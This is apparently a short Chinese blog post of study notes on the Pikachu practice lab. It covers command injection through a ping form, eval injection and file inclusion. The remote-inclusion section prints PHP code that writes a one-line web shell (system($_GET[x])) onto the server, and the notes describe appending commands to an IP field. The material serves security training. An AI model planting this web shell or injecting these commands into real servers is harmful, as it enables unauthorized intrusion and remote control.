pikachu-rce,fileinclusion

RCE

exec ping

输入ip地址
后面加上个ipconfig
 
exec “eval”
这里面直接写命令不行，但是加上函数名称就可以了,输入phpinfo()就行
 
 文件
文件local
所以运用切换目录的方法切换到其他的php文件
 
 
file （remote）
测试之前需要把这俩个参数改成On
然后创建一个代码如下的txt文件

<?php
$myfile = fopen("yijuhua.php", "w");
$txt = '<?php system($_GET[x]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>

然后把filename后面的参数改为你所在的文件路径
之后服务器就会出现你刚才创建的文件

posted @ 2020-03-31 14:47 漩溺阅读(160) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

李时珍的皮ya

pikachu-rce,fileinclusion

公告